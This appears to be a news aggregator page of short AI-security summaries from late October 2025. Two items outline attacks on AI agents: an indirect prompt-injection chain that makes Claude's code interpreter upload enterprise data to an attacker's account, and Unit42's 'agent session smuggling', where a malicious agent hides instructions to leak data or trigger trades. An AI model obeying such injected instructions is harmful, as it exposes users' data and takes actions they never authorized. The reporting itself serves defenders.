All news with #ai security tag
Mon, November 3, 2025
Aligning Security with Business Strategy: Practical Steps
🤝 Security leaders must move beyond a risk-only mindset to actively support business goals, as Jungheinrich CISO Tim Sattler demonstrates by joining his company’s AI center of excellence to advise on both risks and opportunities. Industry research shows significant gaps—only 13% of CISOs are consulted early on major strategic decisions and many struggle to articulate value beyond mitigation. Practical alignment means embedding security into initiatives, using business metrics to measure effectiveness, and prioritizing controls that enable growth rather than impede operations.
Sat, November 1, 2025
OpenAI Eyes Memory-Based Ads for ChatGPT to Boost Revenue
📰 OpenAI is weighing memory-based advertising on ChatGPT as it looks to diversify revenue beyond subscriptions and enterprise deals. The company, valued near $500 billion, has about 800 million users but only ~5% pay, and paid customers generate the bulk of recent revenue. Internally the move is debated — focus groups suggest some users already assume sponsored answers — and the company is expanding cheaper Go plans and purchasable credits.
Fri, October 31, 2025
OpenAI Unveils Aardvark: GPT-5 Agent for Code Security
🔍 OpenAI has introduced Aardvark, an agentic security researcher powered by GPT-5 that autonomously scans source code repositories to identify vulnerabilities, assess exploitability, and propose targeted patches that can be reviewed by humans. Embedded in development pipelines, the agent monitors commits and incoming changes continuously, prioritizes threats by severity and likely impact, and attempts controlled exploit verification in sandboxed environments. Using OpenAI Codex for patch generation, Aardvark is in private beta and has already contributed to the discovery of multiple CVEs in open-source projects.
Fri, October 31, 2025
Microsoft Edge adds scareware sensor for faster blocking
🛡️ Microsoft is adding a new scareware sensor to Edge that notifies Defender SmartScreen in real time to speed up indexing and global blocking of tech-support and full-screen scam pages. The sensor is included in Edge 142, disabled by default, and reports suspected scams immediately without sharing screenshots or extra data beyond SmartScreen’s usual telemetry. Edge’s local scareware blocker — introduced at Ignite 2024 and widely enabled since February — still warns users, exits full-screen, stops loud audio, shows a thumbnail, and offers an option to continue. Microsoft plans to enable the sensor for users who have SmartScreen enabled and will add more anonymous detection signals over time.
Fri, October 31, 2025
AI as Strategic Imperative for Modern Risk Management
🛡️ AI is a strategic imperative for modernizing risk management, enabling organizations to shift from reactive to proactive, data-driven strategies. Manfra highlights four practical AI uses—risk identification, risk assessment, risk mitigation, and monitoring and reporting—and shows how NLP, predictive analytics, automation, and continuous monitoring can improve coverage and timeliness. She also outlines operational hurdles including legacy infrastructure, fragmented tooling, specialized talent shortages, and third-party risks, and calls for leadership-backed governance aligned to SAIF, NIST AI RMF, and ISO 42001.
Fri, October 31, 2025
Claude code interpreter flaw allows stealthy data theft
🔒 A newly disclosed vulnerability in Anthropic’s Claude AI lets attackers manipulate the model’s code interpreter to silently exfiltrate enterprise data. Researcher Johann Rehberger demonstrated an indirect prompt-injection chain that writes sensitive context to the interpreter sandbox and then uploads files using the attacker’s API key to Anthropic’s Files API. The attack abuses the default “Package managers only” network setting, which still permits access to api.anthropic.com, so exfiltration blends with legitimate API traffic. Mitigations are limited and may significantly reduce functionality.
Fri, October 31, 2025
OpenAI Aardvark: GPT-5 Agent to Find and Fix Code Bugs
🛡️ OpenAI has introduced Aardvark, a GPT-5-powered autonomous agent designed to scan, reason about, and patch code with the judgment of a human security researcher. Announced in private beta, Aardvark maps repositories, builds contextual threat models, continuously monitors commits, and validates exploitability in sandboxed environments before reporting findings. When vulnerabilities are confirmed, it proposes fixes via Codex and re-analyzes patches to avoid regressions. OpenAI reports a 92% detection rate in benchmark tests and has already identified real-world flaws in open-source projects, including ten issues assigned CVE identifiers.
Fri, October 31, 2025
Google says Search AI Mode will access personal data
🔎 Google says a forthcoming AI Mode for Search could, with users' opt-in consent, access content from Gmail, Drive, Calendar and Maps to provide customized results and actions. The company is testing early experiments in Labs for personalized shopping and local recommendations, and suggests features like flight summaries, scheduling, or trip planning could leverage that data. Timing remains TBD.
Fri, October 31, 2025
Will AI Strengthen or Undermine Democratic Institutions?
🤖 Bruce Schneier and Nathan E. Sanders present five key insights from their book Rewiring Democracy, arguing that AI is rapidly embedding itself in democratic processes and can both empower citizens and concentrate power. They cite diverse examples — AI-written bills, AI avatars in campaigns, judicial use of models, and thousands of government use cases — and note many adoptions occur with little public oversight. The authors urge practical responses: reform the tech ecosystem, resist harmful applications, responsibly deploy AI in government, and renovate institutions vulnerable to AI-driven disruption.
Fri, October 31, 2025
Agent Session Smuggling Threatens Stateful A2A Systems
🔒 Unit42 researchers Jay Chen and Royce Lu describe agent session smuggling, a technique where a malicious AI agent exploits stateful A2A sessions to inject hidden, multi‑turn instructions into a victim agent. By hiding intermediate interactions in session history, an attacker can perform context poisoning, exfiltrate sensitive data, or trigger unauthorized tool actions while presenting only the expected final response to users. The authors present two PoCs (using Google's ADK) showing sensitive information leakage and unauthorized trades, and recommend layered defenses including human‑in‑the‑loop approvals, cryptographic AgentCards, and context‑grounding checks.
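One recommended defense, human-in-the-loop approval combined with a context-grounding check, can be sketched in a few lines. This is a minimal illustration of the idea, not Unit42's or Google ADK's actual API; all names here are hypothetical:

```python
# Hypothetical gate for tool calls proposed during an A2A session.
# Smuggled mid-session instructions from a peer agent never reach the user,
# so sensitive actions always require explicit human sign-off.

SENSITIVE_TOOLS = {"execute_trade", "read_secrets", "send_email"}

def gate_tool_call(tool_name: str, user_request: str,
                   approver=lambda tool: False) -> bool:
    """Allow a tool call only if a human approves it (sensitive tools) or
    it is plausibly grounded in the visible user request (everything else)."""
    if tool_name in SENSITIVE_TOOLS:
        return approver(tool_name)
    # Cheap context-grounding check: the action must at least relate to the
    # user's own request. A real system would use a classifier or policy
    # engine rather than substring matching.
    return tool_name.replace("_", " ") in user_request.lower()

# A smuggled "execute_trade" instruction is blocked without human approval:
assert gate_tool_call("execute_trade", "summarize this report") is False
assert gate_tool_call("execute_trade", "summarize this report",
                      approver=lambda tool: True) is True
# A grounded, non-sensitive call passes:
assert gate_tool_call("search_web", "Please search web for recent CVEs") is True
```

The point of the sketch is that approval is decided from the user-visible request, not from session history an attacker may have poisoned.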
Fri, October 31, 2025
October 2025: Key Cybersecurity Stories and Guidance
🔒 As October 2025 concludes, ESET Chief Security Evangelist Tony Anscombe reviews the month’s most significant cybersecurity developments and what they mean for defenders. He highlights that Windows 10 reached end of support on October 14 and outlines practical options for affected users and organizations. He also warns about info‑stealing malware spread through TikTok videos posing as free activation guides and summarizes Microsoft’s report that Russia, China, Iran and North Korea are increasingly using AI in cyberattacks — alongside China’s accusation of an NSA operation targeting its National Time Service Center.
Fri, October 31, 2025
Agentic AI: Reset, Business Use Cases, Tools & Lessons
🤖 Agentic AI burst into prominence with promises of streamlining operations and accelerating productivity. This Special Report assesses what's practical versus hype, examining the current state of agentic AI, the primary deployment challenges organizations face, and practical lessons from real-world success stories. It highlights business processes suited to AI agents, criteria for evaluating development tools, and how LinkedIn built its agent platform. The report also outlines near-term expectations and adoption risks.
Fri, October 31, 2025
AI in Bug Bounties: Efficiency Gains and Practical Risks
🤖 AI is increasingly used to accelerate bug bounty research, automating vulnerability discovery, API reverse engineering, and large-scale code scanning. While platforms and triage services like Intigriti can flag unreliable, AI-generated reports, smaller or open-source programs (for example, curl) are overwhelmed by low-quality submissions that consume significant staff time. Experts stress that AI augments skilled researchers but cannot replace human judgment.
Fri, October 31, 2025
Aembit Launches IAM for Agentic AI with Blended Identity
🔐 Aembit today announced Aembit Identity and Access Management (IAM) for Agentic AI, introducing Blended Identity and the MCP Identity Gateway to assign cryptographically verified identities and ephemeral credentials to AI agents. The solution extends the Aembit Workload IAM Platform to enforce runtime policies, apply least-privilege access, and maintain centralized audit trails for agent and human actions. Designed for cloud, on‑premises, and SaaS environments, it records every access decision and preserves attribution across autonomous and human-driven workflows.
Fri, October 31, 2025
AI-Powered Bug Hunting Disrupts Bounty Programs and Triage
🔍 AI-powered tools and large language models are speeding up vulnerability discovery, enabling so-called "bionic hackers" to automate reconnaissance, reverse engineering, and large-scale scanning. Platforms such as HackerOne report sharp increases in valid AI-related reports and payouts, but many submissions are low-quality noise that burdens maintainers. Experts recommend treating AI as a research assistant, strengthening triage, and preserving human judgment to filter false positives and duplicates.
Fri, October 31, 2025
Malicious npm Packages Use Invisible URL Dependencies
🔍 Researchers at Koi Security uncovered a campaign, PhantomRaven, that has contaminated 126 packages in Microsoft's npm registry by embedding invisible HTTP URL dependencies. These remote links are not fetched or analyzed by typical dependency scanners or npmjs.com, making packages appear to have 0 Dependencies while fetching malicious code at install time. The attackers aim to exfiltrate developer credentials and environment details, and they also exploit AI coding assistants' hallucinated package names to choose plausible names for their malicious packages.
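Because npm accepts remote tarball URLs as version specifiers, a manifest can pull code from an attacker-controlled server at install time while registry pages show no dependencies. A simple defensive scan of a package.json can flag such specifiers; this is a minimal sketch (the `helper-lib` entry and its URL are invented for illustration):

```python
import json

# Specifier prefixes that fetch code from outside the npm registry.
REMOTE_PREFIXES = ("http://", "https://", "git://", "git+")

def find_remote_deps(package_json_text: str) -> list:
    """Return (section, name, specifier) for every dependency whose version
    field is a remote URL rather than a semver range."""
    manifest = json.loads(package_json_text)
    hits = []
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in manifest.get(section, {}).items():
            if isinstance(spec, str) and spec.startswith(REMOTE_PREFIXES):
                hits.append((section, name, spec))
    return hits

manifest = '''{
  "name": "demo",
  "dependencies": {
    "left-pad": "^1.3.0",
    "helper-lib": "http://evil.example.com/helper-lib.tgz"
  }
}'''
assert find_remote_deps(manifest) == [
    ("dependencies", "helper-lib", "http://evil.example.com/helper-lib.tgz")
]
```

Running a check like this in CI catches the HTTP-URL trick even when a registry UI reports zero dependencies.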
Thu, October 30, 2025
OpenAI Updates GPT-5 to Better Handle Emotional Distress
🧭 OpenAI rolled out an October 5 update that enables GPT-5 to better recognize and respond to mental and emotional distress in conversations. The change specifically upgrades GPT-5 Instant, the fast default model, so it can detect signs of acute distress and route sensitive exchanges to reasoning models when needed. OpenAI says it developed the update with mental-health experts to prioritize de-escalation and provide appropriate crisis resources while retaining supportive, grounding language. The update is available broadly and complements new company-context access via connected apps.
Thu, October 30, 2025
Agent Registry for Discovering and Verifying Signed Bots
🔐 This post proposes a lightweight, crowd-curated registry for bots and agents to simplify discovery of public keys used for cryptographic Web Bot Auth signatures. It describes a simple list format of URLs that point to signature-agent cards—extended JWKS entries containing operator metadata and keys—and shows how registries enable origins and CDNs to validate agent signatures at scale. Examples and a demo integration illustrate practical adoption.
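The proposed registry is just a list of URLs, each resolving to a signature-agent card: a JWKS document extended with operator metadata. A consumer can be sketched in a few lines; the card fields shown are an illustrative approximation of the format, and the Ed25519 filter reflects the key type commonly used for Web Bot Auth HTTP Message Signatures (an assumption, not a statement of the post's exact schema):

```python
import json

def load_registry(registry_text: str) -> list:
    """Parse a registry: one card URL per line, '#' lines are comments."""
    return [line.strip() for line in registry_text.splitlines()
            if line.strip() and not line.lstrip().startswith("#")]

def parse_agent_card(card_json: str) -> dict:
    """Extract operator metadata and Ed25519 verification keys (keyed by
    'kid') from a signature-agent card, i.e. an extended JWKS document."""
    card = json.loads(card_json)
    keys = {k["kid"]: k for k in card.get("keys", [])
            if k.get("kty") == "OKP" and k.get("crv") == "Ed25519"}
    return {"operator": card.get("operator"), "keys": keys}

registry = """# crowd-curated agent registry (hypothetical entries)
https://bot.example.com/.well-known/signature-agent-card
"""
card = json.dumps({
    "operator": {"name": "ExampleBot", "contact": "ops@example.com"},
    "keys": [{"kty": "OKP", "crv": "Ed25519", "kid": "key-1", "x": "JrQL..."}],
})

assert load_registry(registry) == [
    "https://bot.example.com/.well-known/signature-agent-card"
]
assert "key-1" in parse_agent_card(card)["keys"]
```

An origin or CDN would fetch each listed card, cache the keys by `kid`, and use them to verify incoming request signatures at scale.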
Thu, October 30, 2025
Converged Security and Networking: The Case for SASE
🔒 Today's complex IT environments — multi-cloud, hybrid work, and AI — have expanded the attack surface, exposing limits of fragmented point solutions. The article argues that unifying networking and security on a natively integrated platform like VersaONE reduces blind spots, enforces consistent policies, and enables real-time threat detection and automated response using built-in AI. With zero trust access and microsegmentation, the platform aims to minimize lateral movement and simplify operations compared with bolt-together or 'platformized' vendor offerings.
Thu, October 30, 2025
Five Generative AI Security Threats and Defensive Steps
🔒 Microsoft summarizes the top generative AI security risks and mitigation strategies in a new e-book, highlighting threats such as prompt injection, data poisoning, jailbreaks, and adaptive evasion. The post underscores cloud vulnerabilities, large-scale data exposure, and unpredictable model behavior that create new attack surfaces. It recommends unified defenses—such as CNAPP approaches—and presents Microsoft Defender for Cloud as an example that combines posture management with runtime detection to protect AI workloads.